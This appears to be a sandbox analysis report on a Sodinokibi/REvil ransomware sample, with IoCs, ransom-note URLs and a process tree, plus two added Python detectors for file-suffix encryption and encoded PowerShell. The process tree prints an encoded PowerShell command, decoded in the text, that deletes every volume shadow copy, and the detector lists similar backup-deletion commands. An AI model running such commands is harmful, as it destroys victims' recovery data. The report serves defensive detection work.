Analysis
max time kernel: 166s
max time network: 182s
platform: windows10_x64
resource: win10-en-20211208
submitted: 24-01-2022 00:45
Static task: static1
Behavioral task: behavioral1
  Sample: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
  Resource: win10-en-20211208
General
Target: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
Size: 165KB
MD5: 6edc8e537c6cf38e56fcf2af79980344
SHA1: 024bf6e1cd3084bb453b1826f350e853b1951727
SHA256: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1
SHA512: 5e3cead37cd53c3003f68dd5c4fe87b30d7edefba3ab48a86e2efb2704060b74008011ff0157df26fd161ad411ddae0296f83cfb5a6affc10e7856285121f518
Malware Config
Extracted from: C:\fkr31h99x-readme.txt (ransom note)
Family: sodinokibi
URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A124055E5D1D8F65
  http://decryptor.cc/A124055E5D1D8F65
Signatures
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
Process (all rows): ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
description | ioc
File opened for modification | \??\c:\users\admin\pictures\RenameEnter.tiff
File renamed | C:\Users\Admin\Pictures\DenyEnable.tiff => \??\c:\users\admin\pictures\DenyEnable.tiff.fkr31h99x
File renamed | C:\Users\Admin\Pictures\HideConvertTo.crw => \??\c:\users\admin\pictures\HideConvertTo.crw.fkr31h99x
File renamed | C:\Users\Admin\Pictures\NewFind.crw => \??\c:\users\admin\pictures\NewFind.crw.fkr31h99x
File renamed | C:\Users\Admin\Pictures\SyncCompare.crw => \??\c:\users\admin\pictures\SyncCompare.crw.fkr31h99x
File renamed | C:\Users\Admin\Pictures\UnpublishUndo.crw => \??\c:\users\admin\pictures\UnpublishUndo.crw.fkr31h99x
File renamed | C:\Users\Admin\Pictures\ClearWatch.crw => \??\c:\users\admin\pictures\ClearWatch.crw.fkr31h99x
File opened for modification | \??\c:\users\admin\pictures\DenyEnable.tiff
File opened for modification | \??\c:\users\admin\pictures\PingUnpublish.tiff
File renamed | C:\Users\Admin\Pictures\PingUnpublish.tiff => \??\c:\users\admin\pictures\PingUnpublish.tiff.fkr31h99x
File renamed | C:\Users\Admin\Pictures\RenameEnter.tiff => \??\c:\users\admin\pictures\RenameEnter.tiff.fkr31h99x
File renamed | C:\Users\Admin\Pictures\SetWatch.raw => \??\c:\users\admin\pictures\SetWatch.raw.fkr31h99x
File renamed | C:\Users\Admin\Pictures\ResizeRestore.tif => \??\c:\users\admin\pictures\ResizeRestore.tif.fkr31h99x
Adds Run key to start application 2 TTPs 2 IoCs
Process (all rows): ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
description | ioc
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\i7bumVGoL5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe"
The WOW6432Node path is the registry redirector's view: a 32-bit process writing HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run on 64-bit Windows lands here, so hunt for the value under both the native and the WOW6432Node Run keys.
Drops desktop.ini file(s) 26 IoCs
Process (all rows): ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
description | ioc
File opened for modification | \??\c:\users\admin\music\desktop.ini
File opened for modification | \??\c:\users\admin\onedrive\desktop.ini
File opened for modification | \??\c:\users\admin\pictures\desktop.ini
File opened for modification | \??\c:\users\admin\searches\desktop.ini
File opened for modification | \??\c:\users\admin\videos\desktop.ini
File opened for modification | \??\c:\users\public\documents\desktop.ini
File opened for modification | \??\c:\users\admin\documents\desktop.ini
File opened for modification | \??\c:\users\public\accountpictures\desktop.ini
File opened for modification | \??\c:\users\public\desktop\desktop.ini
File opened for modification | \??\c:\users\public\music\desktop.ini
File opened for modification | \??\c:\users\public\videos\desktop.ini
File opened for modification | \??\c:\users\admin\desktop\desktop.ini
File opened for modification | \??\c:\users\admin\downloads\desktop.ini
File opened for modification | \??\c:\users\public\libraries\desktop.ini
File opened for modification | \??\c:\users\public\pictures\desktop.ini
File opened for modification | \??\c:\users\admin\pictures\camera roll\desktop.ini
File opened for modification | \??\c:\users\admin\pictures\saved pictures\desktop.ini
File opened for modification | \??\c:\users\public\desktop.ini
File opened for modification | \??\c:\program files (x86)\desktop.ini
File opened for modification | \??\c:\users\admin\contacts\desktop.ini
File opened for modification | \??\c:\users\admin\favorites\desktop.ini
File opened for modification | \??\c:\users\admin\links\desktop.ini
File opened for modification | \??\c:\users\admin\saved games\desktop.ini
File opened for modification | \??\c:\users\public\downloads\desktop.ini
File opened for modification | \??\c:\users\admin\favorites\links\desktop.ini
File opened for modification | \??\c:\program files\desktop.ini
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Process (all rows): ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
description | ioc
File opened (read-only) | \??\V:, \??\G:, \??\M:, \??\N:, \??\Q:, \??\T:, \??\P:, \??\S:, \??\W:, \??\A:, \??\B:, \??\I:, \??\K:,
File opened (read-only) | \??\O:, \??\Y:, \??\Z:, \??\D:, \??\F:, \??\J:, \??\L:, \??\R:, \??\X:, \??\E:, \??\H:, \??\U:
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Process: ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
description | ioc
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\do539p5.bmp"
Drops file in Program Files directory 38 IoCs
Process (all rows): ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
description | ioc
File opened for modification | \??\c:\program files\DisableStop.ADTS
File opened for modification | \??\c:\program files\ResizeRequest.raw
File opened for modification | \??\c:\program files\UnprotectRevoke.js
File opened for modification | \??\c:\program files\UnregisterRename.aif
File opened for modification | \??\c:\program files\UseSplit.xml
File opened for modification | \??\c:\program files\WatchCompare.otf
File created | \??\c:\program files\fkr31h99x-readme.txt
File created | \??\c:\program files (x86)\fkr31h99x-readme.txt
File opened for modification | \??\c:\program files\EnableStep.eps
File opened for modification | \??\c:\program files\InitializeExpand.aif
File opened for modification | \??\c:\program files\RepairSkip.TS
File opened for modification | \??\c:\program files\WatchSearch.mov
File opened for modification | \??\c:\program files\WriteRedo.dib
File opened for modification | \??\c:\program files\AddConnect.cfg
File opened for modification | \??\c:\program files\AssertNew.mpeg2
File opened for modification | \??\c:\program files\EnterJoin.odt
File opened for modification | \??\c:\program files\LimitDisable.vsw
File opened for modification | \??\c:\program files\MoveUnprotect.DVR-MS
File opened for modification | \??\c:\program files\LockStart.mhtml
File opened for modification | \??\c:\program files\OutAssert.DVR-MS
File opened for modification | \??\c:\program files\ProtectConvertFrom.jpeg
File opened for modification | \??\c:\program files\SearchConvertTo.ppt
File opened for modification | \??\c:\program files (x86)\desktop.ini
File opened for modification | \??\c:\program files\DismountRequest.inf
File opened for modification | \??\c:\program files\ExitGroup.eprtx
File opened for modification | \??\c:\program files\PublishImport.DVR
File opened for modification | \??\c:\program files\desktop.ini
File opened for modification | \??\c:\program files\DismountDisconnect.asp
File opened for modification | \??\c:\program files\ShowWait.mpeg3
File opened for modification | \??\c:\program files\TestEnter.eps
File opened for modification | \??\c:\program files\WatchSuspend.dwg
File opened for modification | \??\c:\program files\CompareResolve.asf
File opened for modification | \??\c:\program files\GroupInvoke.ram
File opened for modification | \??\c:\program files\PingGet.au3
File opened for modification | \??\c:\program files\ResizeInstall.xltm
File opened for modification | \??\c:\program files\SendUpdate.ttc
File opened for modification | \??\c:\program files\MergeStart.ADT
File opened for modification | \??\c:\program files\StopUnblock.avi
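The "Modifies extensions of user files" and "Drops file in Program Files directory" sections together show the two on-disk artefacts that identify this family: every encrypted file keeps its original name and gains the same appended extension (.fkr31h99x here), and a note named <extension>-readme.txt is created in the directories it touches (the same name the Malware Config section was extracted from). The Python below is an added example, not part of this report or of any sandbox's code. It parses event lines in the report's own "File renamed A => B" / "File created P" format, derives the appended extension from the renames, and checks whether a matching note was created. The sample lines are constructed from a subset of the rows above plus one benign rename that must not count; the function names, the min_renames threshold and the verdict fields are my own.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Constructed sample: six rename rows and two note-creation rows taken from this
# report, one benign rename (name changed, not suffixed) and one unrelated event.
SAMPLE_EVENTS = r"""
File renamed C:\Users\Admin\Pictures\DenyEnable.tiff => \??\c:\users\admin\pictures\DenyEnable.tiff.fkr31h99x
File renamed C:\Users\Admin\Pictures\HideConvertTo.crw => \??\c:\users\admin\pictures\HideConvertTo.crw.fkr31h99x
File renamed C:\Users\Admin\Pictures\NewFind.crw => \??\c:\users\admin\pictures\NewFind.crw.fkr31h99x
File renamed C:\Users\Admin\Pictures\SyncCompare.crw => \??\c:\users\admin\pictures\SyncCompare.crw.fkr31h99x
File renamed C:\Users\Admin\Pictures\SetWatch.raw => \??\c:\users\admin\pictures\SetWatch.raw.fkr31h99x
File renamed C:\Users\Admin\Pictures\ResizeRestore.tif => \??\c:\users\admin\pictures\ResizeRestore.tif.fkr31h99x
File renamed C:\Users\Admin\Documents\draft.docx => \??\c:\users\admin\documents\draft-final.docx
File created \??\c:\program files\fkr31h99x-readme.txt
File created \??\c:\program files (x86)\fkr31h99x-readme.txt
File opened for modification \??\c:\users\admin\music\desktop.ini
"""

RENAME_RE = re.compile(r"^File renamed (.+?) => (.+)$")
CREATE_RE = re.compile(r"^File created (.+)$")


def normalize(path: str) -> str:
    """Drop the NT object-manager prefix and fold case so the Win32 and NT
    spellings of the same path compare equal."""
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def appended_extension(old: str, new: str) -> Optional[str]:
    """Return the suffix appended to an otherwise unchanged path, else None.
    A rename that changes the base name (draft.docx -> draft-final.docx) returns None."""
    old_n, new_n = normalize(old), normalize(new)
    if new_n.startswith(old_n + ".") and len(new_n) > len(old_n) + 1:
        return new_n[len(old_n) + 1:]
    return None


def analyze_file_events(events: str, min_renames: int = 5) -> Dict:
    """Flag mass suffixing of files with one new extension plus a note named
    '<extension>-readme.txt' (the note naming seen in this report)."""
    ext_counts: Counter = Counter()
    created: List[str] = []
    for line in events.strip().splitlines():
        m = RENAME_RE.match(line)
        if m:
            ext = appended_extension(m.group(1), m.group(2))
            if ext:
                ext_counts[ext] += 1
            continue
        m = CREATE_RE.match(line)
        if m:
            created.append(normalize(m.group(1)))
    if not ext_counts:
        return {"extension": None, "renamed": 0, "note_paths": [], "verdict": False}
    ext, count = ext_counts.most_common(1)[0]
    note_name = f"{ext}-readme.txt"
    notes = [p for p in created if PureWindowsPath(p).name == note_name]
    return {
        "extension": ext,
        "renamed": count,
        "note_paths": notes,
        "verdict": count >= min_renames and bool(notes),
    }


if __name__ == "__main__":
    print(analyze_file_events(SAMPLE_EVENTS))
```

The extension is learned from the renames rather than hard-coded because this family generates it per victim; a watchlist of known extensions would never contain .fkr31h99x. Requiring both the suffix pattern and the matching note keeps a bulk rename by a backup tool from tripping the rule on its own.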
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid | process
920 | ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
920 | ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
1160 | powershell.exe
1160 | powershell.exe
1160 | powershell.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
description | pid | process
Token: SeDebugPrivilege | 920 | ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
Token: SeDebugPrivilege | 1160 | powershell.exe
Token: SeBackupPrivilege | 1212 | vssvc.exe
Token: SeRestorePrivilege | 1212 | vssvc.exe
Token: SeAuditPrivilege | 1212 | vssvc.exe
Suspicious use of WriteProcessMemory 2 IoCs
description | pid | process | target process
PID 920 wrote to memory of 1160 | 920 | ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe | powershell.exe
PID 920 wrote to memory of 1160 | 920 | ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe | powershell.exe
Processes
1. C:\Users\Admin\AppData\Local\Temp\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe"
   PID: 920
   - Modifies extensions of user files
   - Adds Run key to start application
   - Drops desktop.ini file(s)
   - Enumerates connected drives
   - Sets desktop wallpaper using registry
   - Drops file in Program Files directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 920)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 1160
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\system32\wbem\unsecapp.exe
   Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
   PID: 2264
1. C:\Windows\system32\vssvc.exe
   Command line: C:\Windows\system32\vssvc.exe
   PID: 1212
   - Suspicious use of AdjustPrivilegeToken
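The encoded PowerShell child is the line in this tree that matters most. -e is an abbreviation of -EncodedCommand, whose argument is the script base64-encoded as UTF-16LE; decoding it gives `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, deletion of every volume shadow copy through WMI. That is also why unsecapp.exe (WMI's client callback host, started with -Embedding) and vssvc.exe (the Volume Shadow Copy service, seen above acquiring SeBackupPrivilege and SeRestorePrivilege) appear as separate top-level processes rather than as children of the sample. The Python below is an added example, not part of this report or of the sandbox: it pulls the encoded argument out of a command line, decodes it, and matches the decoded script against common shadow-copy-deletion commands. powershell.exe accepts abbreviated parameter names, so the helper matches any prefix of -EncodedCommand instead of a fixed list of spellings. REVIL_CMDLINE is the command line from this report; the benign command line and all function and pattern names are my own.

```python
import base64
import binascii
import re
from typing import Dict, Optional

# Command line of the powershell.exe child (PID 1160) exactly as logged in this report.
REVIL_CMDLINE = "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="


def is_encoded_flag(token: str) -> bool:
    """True for -e, -ec, -enc, /EncodedCommand and every other prefix powershell.exe
    resolves to -EncodedCommand (-ep and -ex* do not match)."""
    name = token.lstrip("-/").lower()
    return bool(name) and "encodedcommand".startswith(name)


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the base64 argument following the encoded-command flag, if any."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 over UTF-16LE bytes."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not valid base64: {exc}") from exc
    if len(raw) % 2:
        raise ValueError("odd byte count; not a UTF-16LE payload")
    return raw.decode("utf-16-le")


# Detection patterns (my own list): the WMI route used here plus the usual
# command-line equivalents, all matched case-insensitively.
SHADOW_COPY_PATTERNS = {
    "wmi Win32_ShadowCopy Delete": re.compile(r"win32_shadowcopy.*?\.delete\s*\(", re.I | re.S),
    "vssadmin delete shadows": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "wmic shadowcopy delete": re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
    "wbadmin delete catalog": re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I),
}


def analyze_powershell_cmdline(cmdline: str) -> Dict:
    """Decode an encoded command if present, then scan the script (or the raw
    command line when nothing was encoded) for shadow-copy deletion."""
    encoded = extract_encoded_argument(cmdline)
    decoded = None
    if encoded is not None:
        try:
            decoded = decode_encoded_command(encoded)
        except ValueError:
            decoded = None  # malformed payload: fall back to scanning the raw line
    script = decoded if decoded is not None else cmdline
    hits = [name for name, rx in SHADOW_COPY_PATTERNS.items() if rx.search(script)]
    return {
        "encoded": encoded is not None,
        "decoded": decoded,
        "shadow_copy_deletion": bool(hits),
        "matched": hits,
    }


if __name__ == "__main__":
    # Constructed benign command line for contrast.
    for line in (REVIL_CMDLINE, 'powershell -NoProfile -Command "Get-Date"'):
        print(analyze_powershell_cmdline(line))
```

An encoded command on its own is only a weak signal; the decoded content is what separates this from an administrator's script. Where Script Block Logging is enabled, Event ID 4104 records the script text after decoding, so the same patterns apply there without the base64 step.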
Network
MITRE ATT&CK Enterprise v6
Downloads
memory/1160-123-0x000002245FCB0000-0x000002245FCB2000-memory.dmp (Filesize 8KB)
memory/1160-124-0x000002245FCB3000-0x000002245FCB5000-memory.dmp (Filesize 8KB)
memory/1160-125-0x000002245FDA0000-0x000002245FDC2000-memory.dmp (Filesize 136KB)
memory/1160-130-0x000002247A0B0000-0x000002247A126000-memory.dmp (Filesize 472KB)